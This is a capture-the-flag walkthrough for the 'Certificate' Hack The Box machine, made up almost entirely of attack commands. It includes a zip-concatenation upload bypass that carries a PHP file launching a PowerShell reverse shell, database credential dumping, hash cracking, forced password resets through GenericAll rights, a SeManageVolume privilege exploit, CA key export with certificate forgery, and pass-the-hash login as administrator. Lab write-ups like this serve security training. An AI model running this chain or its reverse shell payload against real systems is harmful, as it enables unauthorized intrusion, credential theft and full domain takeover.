Certificate
Certificate
First of all we need to go to the website http://certificate.htb and register and login.
echo '10.10.11.71 certificate.htb DC01.certificate.htb' | sudo tee -a
/etc/hosts
If we run gobuster we can see there's a php file called upload.php
gobuster dir -u "http://certificate.htb" -w
/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-
medium.txt -t 100 -x
1/9
� Certificate
If we go to the website it says this
So I fuzzed in burpsuite or you can even do it with wfuzz until I found valid s_id
http://certificate.htb/upload.php?s_id=FUZZ
In this case I will go to the http://certificate.htb/upload.php?s_id=36
Here we have a file upload functionality
Here I crafted my malicious .zip for getting a reverse.
echo "I love Astro" > legit.pdf
zip benign.zip legit.pdf
mkdir malicious_files
cd malicious_files
nano shell.php
<?php
shell_exec("powershell -nop -w hidden -c \"\$client = New-Object
System.Net.Sockets.TCPClient('YOURIP',4444); \$stream =
\$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i =
\$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){; \$data = (New-Object -
TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i); \$sendback =
(iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' +
(pwd).Path + '> '; \$sendbyte =
2/9
� Certificate
([text.encoding]::ASCII).GetBytes(\$sendback2);
\$stream.Write(\$sendbyte,0,\$sendbyte.Length); \$stream.Flush()};
\$client.Close()\"");
?>
cd ..
zip -r malicious.zip malicious_files/
cat benign.zip malicious.zip > combined.zip
Now upload the combined.zip
For trigger the php execution it will generate a link so click it, in my case is
http://certificate.htb/static/uploads/6fd6ce565d8e0c484086e1debee16872/legit.pdf
Then we need to change the url like this
http://certificate.htb/static/uploads/6fd6ce565d8e0c484086e1debee16872/malicious_files/sh
ell.php
Before going we setup our listener nc -nlvp 4444
And we get a shell as xamppuser, here we need to go some directories back and read the
3/9
� Certificate
db.php
I crafted this command for retrieve the users.
C:\xampp\mysql\bin\mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -D
Certificate_WEBAPP_DB -e "SELECT * FROM users;"
This is the result.
Here we need to focus on Sara.B hash, save its hash into hash.txt
And then crack it with hashcat, I used this command
hashcat -a 0 -m 3200 hash.txt /usr/share/wordlists/rockyou.txt -O
We get Sara.B and its password is Blink182.
First of all I runned bloodhound to see more about this AD.
bloodhound-python -u 'Sara.B' -p 'Blink182' -d certificate.htb -c All --zip -ns
10.10.11.71
Once in the bloodhound if we search by Sara.B and we go down we can see Transitive
Object Control
4/9
� Certificate
Here we can see the following scheme, this scheme means that Sara.B is a member of
Account Operators.
5/9
� Certificate
If we go to Account Operators Group and go to Reachable High value Targets
In this scheme we can see that this group has GenericAll to LION.SK
To abuse that we can simply run this command
net rpc password "lion.sk" "newP@ssword2022" -U
"certificate.htb"/"Sara.B"%"Blink182" -S certificate.htb
Now we can login via winrm with this credentials and we are in. Flag is located in
C:\Users\Lion.SK\Desktop\user.txt
For root first we need to change Ryan.K password and login via winrm.
This is the command I used.
net rpc password "Ryan.K" "newP@ssword2022" -U
"certificate.htb"/"Sara.B"%"Blink182" -S certificate.htb
6/9
� Certificate
Once in the winrm session if the print the command whoami /priv
We can see that has SeManageVolumePrivilege for abuse that we can simply upload this
.exe
https://github.com/CsEnox/SeManageVolumeExploit/releases/tag/public
Download the .exe and upload it
If we execute it we can see the following Output
Running this exploit means that Ryan.K now has Full Control over C:
Following this we can simply run the following commands.
certutil -exportPFX my "Certificate-LTD-CA" C:\Users\Public\ca.pfx
7/9
� Certificate
Now we can download this ca.pfx to our machine.
With this ca.pfx we can forge our administrator.pfx
So I runned this command
certipy forge -ca-pfx ca.pfx \
-upn '
[email protected]' \
-subject 'CN=Administrator,CN=Users,DC=certificate,DC=htb' \
-out forged_admin.pfx
Final step is abuse certipy auth for getting the Administrator hash.
certipy auth -pfx forged_admin.pfx \
-dc-ip 10.10.11.71 \
-username 'administrator' \
-domain 'certificate.htb'
8/9
� Certificate
Now we can login via evil-winrm or psexec I will show the two methods in case one fail.
evil-winrm -i 10.10.11.71 -u administrator -
H'd803303515bf814ac14c5f1702abh866'
'aad3b435b51404eeaad3b435b51404ee:d803303515bf814ac14c5f1702abh866'
I changed the hashes :) So I make sure everyone does this machine.
9/9
